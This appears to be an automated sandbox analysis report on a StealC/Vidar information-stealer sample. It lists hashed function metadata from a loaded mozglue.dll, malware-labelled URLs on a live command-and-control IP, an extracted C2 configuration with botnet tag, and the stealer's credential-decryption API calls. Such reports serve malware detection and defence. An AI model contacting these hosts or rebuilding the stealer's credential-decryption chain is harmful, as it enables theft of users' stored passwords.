EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C675D67
__aulldiv.LIBCMT ref: 6C675DB4
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C675DED

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: fccf99705cd4046480c0da99a08bcdfb038165868c156f85a6ca97cbfd90524e
Instruction ID: d33b4dba655bb99291579b5ea7e7ad6204471695016f9aad492d62ec9b1b7e3c
Opcode Fuzzy Hash: fccf99705cd4046480c0da99a08bcdfb038165868c156f85a6ca97cbfd90524e
Instruction Fuzzy Hash: 89518F71E001698FCF08CF69C994AAEBBF1FB85304F198A5DD811A7B50C7307945CB99

Function 6C65CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C65CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C65CF4E

Strings

0, xrefs: 6C65CF30

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 196597a6bdbc8dad2df6b501d6b72384db2d0378a8bf5e5c92be4be767be814e
Instruction ID: e54310c26906e80553e8d3bb2d46e827d1f78c5d19c18f1187dfef5d907545ba
Opcode Fuzzy Hash: 196597a6bdbc8dad2df6b501d6b72384db2d0378a8bf5e5c92be4be767be814e
Instruction Fuzzy Hash: 9D511475A002568FCB00CF18C890A9AFBB5EF99300F29859DD95A5F351D731ED16CBE0

Function 6C696470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6982BC,?,?), ref: 6C69649B

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6964A9

Part of subcall function 6C68FA80: GetCurrentThreadId.KERNEL32 ref: 6C68FA8D
Part of subcall function 6C68FA80: AcquireSRWLockExclusive.KERNEL32(6C6DF448), ref: 6C68FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C69653F
free.MOZGLUE(?), ref: 6C69655A

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 84f714f4f15ae930f76b2db4f443e3ba3e75a5f9a40559ef3b81db765fb5b1f9
Instruction ID: 98cb846002616a141ddfcc5cd91472c026677bdcc18c31a34d08c92d525b97ac
Opcode Fuzzy Hash: 84f714f4f15ae930f76b2db4f443e3ba3e75a5f9a40559ef3b81db765fb5b1f9
Instruction Fuzzy Hash: 223161B5A04305AFD740CF15D88469AB7E4FF89314F00482EE85A97751DB34E919CBDA

Function 6C66B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C66B4F5
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C66B502
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C66B542
free.MOZGLUE(?), ref: 6C66B578

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: d6fce4e0f5ce2d2612f5934e6f077c7e1e761546c7ba7781ddcddf79526bcbfe
Instruction ID: f8c6926e3cb4d4af112b9870dfa7403b397d49b61d05b120268176a51f4f12c6
Opcode Fuzzy Hash: d6fce4e0f5ce2d2612f5934e6f077c7e1e761546c7ba7781ddcddf79526bcbfe
Instruction Fuzzy Hash: 85110330A04B41C7D321CF2AC8407A5B3B0FFDA319F14970AE84953E02EBB0B5C5879A

Function 6C693DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C65F20E,?), ref: 6C693DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C65F20E,00000000,?), ref: 6C693DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C693E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C693E0E

Part of subcall function 6C68CC00: GetCurrentProcess.KERNEL32(?,?,6C6531A7), ref: 6C68CC0D
Part of subcall function 6C68CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6531A7), ref: 6C68CC16

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 82a6360a373ecd281ae6919c82bcd1b75556bec14f788fb4d8f0f9eba5c47a7f
Instruction ID: 1eb75ff979cc5475eae7f49dcf4a0ee0aad8e9e8d9996727dab3d755bc266919
Opcode Fuzzy Hash: 82a6360a373ecd281ae6919c82bcd1b75556bec14f788fb4d8f0f9eba5c47a7f
Instruction Fuzzy Hash: 9BF0F8B1A002087BDB00AB55EC81DAB376DEB87628F040021FE0957741D636BE6996FF

Function 6C6A85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C6A85D3

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C6A8725

Strings

map/set<T> too long, xrefs: 6C6A8720

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: a2a27303650dbd5e9a7fe60878a720a47f4d3f5136fab0440a28ca324daa6040
Instruction ID: 70b27cce337b19c255c6b91cde610e625e735871812691eeb71a8baf6980d39e
Opcode Fuzzy Hash: a2a27303650dbd5e9a7fe60878a720a47f4d3f5136fab0440a28ca324daa6040
Instruction Fuzzy Hash: FA515674A006818FE701CF58C184A59FBF1BF4A318F19C19AD8595BB62C375EC46CF96

Function 6C65BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C65BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C65BE8F

Strings

0, xrefs: 6C65BE5B

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 649d6500970ca855c2c481ee1f24676c81dfb6642f3f8c832d97c200676fd99e
Instruction ID: 5aff77c52a83a249f610f6a40117f5f17253505299baa17352f2cf3b02d9aadf
Opcode Fuzzy Hash: 649d6500970ca855c2c481ee1f24676c81dfb6642f3f8c832d97c200676fd99e
Instruction Fuzzy Hash: 6F41B171A09745CFC301CF28C481A9BB7F4AFCA388F544B1DF985A7611D730E9698B8A

Function 6C693CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C693D19
mozalloc_abort.MOZGLUE(?), ref: 6C693D6C

Strings

d, xrefs: 6C693D58

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 79547db147bd6d31f76d90bae60149de37a63823fd5d36e282509eb561b16e80
Instruction ID: ae81405fb39a1e9092750637fc88ed10a7b0fe2e72f912b9bd23e2162f856e3d
Opcode Fuzzy Hash: 79547db147bd6d31f76d90bae60149de37a63823fd5d36e282509eb561b16e80
Instruction Fuzzy Hash: 8111C435E0468997DB008F6ACC644EDB7B5EF86318F458229DD4997622EB30A688C398

Function 6C6B6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C6B6E22
__Init_thread_footer.LIBCMT ref: 6C6B6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C6B6E1D

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 39a29bee2b8b57065e6a5f8ed2424b066c1647657c83e079799a23cb29785f06
Instruction ID: bcd68a56edc4a956bdd073aa2d8006e056c651a881adc380280f84d7f154e701
Opcode Fuzzy Hash: 39a29bee2b8b57065e6a5f8ed2424b066c1647657c83e079799a23cb29785f06
Instruction Fuzzy Hash: 2DF02E302492C08BDB008B69C8A1A9173B29303318F080165F80196FA2CB31F627CFAF

Function 6C669E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C669EEF

Strings

Infinity, xrefs: 6C669EB7
NaN, xrefs: 6C669EC1

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 69064ab08258a321f268fc936855b8ae153423eff6b17a422022ef0b64cf6071
Instruction ID: c4194f2a258d45e7e49048328d94766e7d17b0c02063ac6c994417b112666e3a
Opcode Fuzzy Hash: 69064ab08258a321f268fc936855b8ae153423eff6b17a422022ef0b64cf6071
Instruction Fuzzy Hash: E1F06D71601641CBDB00CF5AD8C5B9033F1B74771DF250A19C9440AF81D7767646CA9F

Function 6C666C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0Kil,?,6C694B30,80000000,?,6C694AB7,?,6C6543CF,?,6C6542D2), ref: 6C666C42

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

moz_xmalloc.MOZGLUE(0Kil,?,6C694B30,80000000,?,6C694AB7,?,6C6543CF,?,6C6542D2), ref: 6C666C58

Strings

0Kil, xrefs: 6C666C33, 6C666C41, 6C666C57

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0Kil
API String ID: 1967447596-1570486273
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 47a2848e409718a8f1d8a2683fe2594ab049f9b896a105d641ef50186a662689
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: F4E086F1A10D455B9F08D97FAC0956A71C88B553AC7044A35E823C6FC8FAB4E550815F

Function 6C66BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C66BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C66BEF5

Strings

cryptbase.dll, xrefs: 6C66BEF0

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 4870778a0ef8a45ee3d799cae793fcd5ec17f4a2edcaed08401fe318736b03b0
Instruction ID: 44563a522ee1324380eaf9a3347d73bdea828b5c897ecfb4e6088c6321dae0f1
Opcode Fuzzy Hash: 4870778a0ef8a45ee3d799cae793fcd5ec17f4a2edcaed08401fe318736b03b0
Instruction Fuzzy Hash: F7D0A731184209E6C7006B528C05B2937749782795F10C020F30544C52C7B0B413DF4D

Function 6C6AB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB628

Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A90FF
Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C6AB127,?,?,?,?,?,?,?,?), ref: 6C6AB74D

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 40779d404a368615f40afe1c83035d14527e88d70c3251f7b9a6a7ada22aca6f
Instruction ID: 085effcad87eddf0045659a872f45dad84b52f8dd6c581acd935d8d6010fba1a
Opcode Fuzzy Hash: 40779d404a368615f40afe1c83035d14527e88d70c3251f7b9a6a7ada22aca6f
Instruction Fuzzy Hash: 2251D071A0121A8FDB14CF98C98076EB7B1FF85308F55852DC85AAB710D771EC06CBA9

Function 6C6A6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C6A6EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C6A6EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6A6F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A6F5C

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 8644ccabdd39f7598f8190600c280acc267cedd63c2cddf56738e80d0d2e0910
Instruction ID: 0bc45efbc56a15fb90265375e450124e3aef0bdf4470a3bdb9cd26a8f81ef013
Opcode Fuzzy Hash: 8644ccabdd39f7598f8190600c280acc267cedd63c2cddf56738e80d0d2e0910
Instruction Fuzzy Hash: 7C31F871A1060A8FDB04CF6CC980AAA73FAFB95304F50413DD41AC7651EF31E95AC794

Function 6C6BB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C660A4D), ref: 6C6BB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C660A4D), ref: 6C6BB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C660A4D), ref: 6C6BB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C660A4D), ref: 6C6BB67F

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: d9d209a4901d0ed02fe7198cde96c2de8e2dc279f2c773b95c5bc01864716047
Instruction ID: 8faa6fbec7cdb6eb0e23bb9a89ffa2cdca4c2045baff36eeb0e7f7c129bded36
Opcode Fuzzy Hash: d9d209a4901d0ed02fe7198cde96c2de8e2dc279f2c773b95c5bc01864716047
Instruction Fuzzy Hash: 1C31D471A012168FDB10CF59C8C469ABBB5FFC5304F168669C846EB201EB31ED25CBA5

Function 6C68F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C68F611
memcpy.VCRUNTIME140(?,?,?), ref: 6C68F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C68F652
memcpy.VCRUNTIME140(?,?,?), ref: 6C68F668

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: fd0c959764e2c6f652b47417bb4cdd4b4b8c15a0ef4d9854fa31841a68e36b3a
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 95316F71B00214AFC714CF1DDCC0A9B7BB5EB94354B148538FA4A8BB04D732E9448BAA

Function 6C6A26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A26C1
free.MOZGLUE(?), ref: 6C6A26E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A26FF
free.MOZGLUE ref: 6C6A270D

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d1ae15fc273256de6d2d0fba886dda6b015f370c63a0962ebae03874a0add4ca
Instruction ID: da9dc1a29145f47382f95be9498f80c97c9091a0ac98734626d699cba01f1fb2
Opcode Fuzzy Hash: d1ae15fc273256de6d2d0fba886dda6b015f370c63a0962ebae03874a0add4ca
Instruction Fuzzy Hash: EFF0F9B27012046BE7109E5AD8C4D4773A9EF4131CB100035EA1EC3B11E332FD1AC6AE

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	URL Reputation: Label: malware

Source: 0.2.file.exe.810000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.810000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00819B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00819B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0081C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00819AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00819AC0
